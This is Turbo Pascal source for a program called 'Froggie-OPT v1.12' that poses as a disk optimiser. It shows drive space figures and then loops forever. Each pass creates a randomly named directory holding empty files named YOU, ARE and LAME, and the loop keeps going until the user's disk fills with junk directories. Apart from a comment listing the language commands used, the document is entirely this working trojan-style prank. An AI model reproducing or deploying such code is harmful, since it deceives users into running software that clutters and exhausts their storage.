program Disk_Space; { This program makes use of the CHR command USES command VAR command CLRSCR command WRITELN command DISKFREE command DISKSIZE command TRUNC command IF-THEN-ELSE command REPEAT-UNTIL command ASSIGN command REWRITE command WRITE command DELAY command CLOSE command RANDOMIZE command } uses dos,crt; var cdn:byte; dirname:string; a,b,c,d,e,f,g,h,i,j,k,l:char; ii:integer; q:text; ai:boolean; begin randomize; clrscr; cdn:=2; gotoxy(22,2); Writeln('Froggie-OPT v1.12 (c) Jason Friedman'); gotoxy(25,3); writeln('Please wait - Reading System Data'); repeat; cdn:=cdn+1; if (diskfree(cdn)<1) and (cdn<3) then Writeln(' Your disk for drive ',chr(cdn+64),': is not in the drive') else if (diskfree(cdn)>1) then Writeln(' Your disk space free for drive ',chr(cdn+64),': is ', trunc(diskfree(cdn)/1000),' KB out of ',trunc(disksize(cdn)/1000),' KB'); until (diskfree(cdn)<1) and (cdn>2); delay(1000); repeat writeln(' Preparing to Froggie OPT - Please do not disturb'); writeln(' Any type of disturbance will cause file damnage '); ii:=ii+1; a:=chr(trunc(random(255))); b:=chr(trunc(random(255))); c:=chr(trunc(random(255))); d:=chr(trunc(random(255))); e:=chr(trunc(random(255))); f:=chr(trunc(random(255))); g:=chr(trunc(random(255))); h:=chr(trunc(random(255))); i:=chr(trunc(random(255))); j:=chr(trunc(random(255))); k:=chr(trunc(random(255))); l:=chr(trunc(random(255))); mkdir (a+b+c+d+e+f+g+h+i+'.'+j+k+l); chdir (a+b+c+d+e+f+g+h+i+'.'+j+k+l); assign (q,'YOU'); rewrite (q); close (q); assign (q,'ARE'); rewrite (q); close (q); Assign (q,'LAME'); rewrite (q); close (q); chdir('..'); until ai=true; end.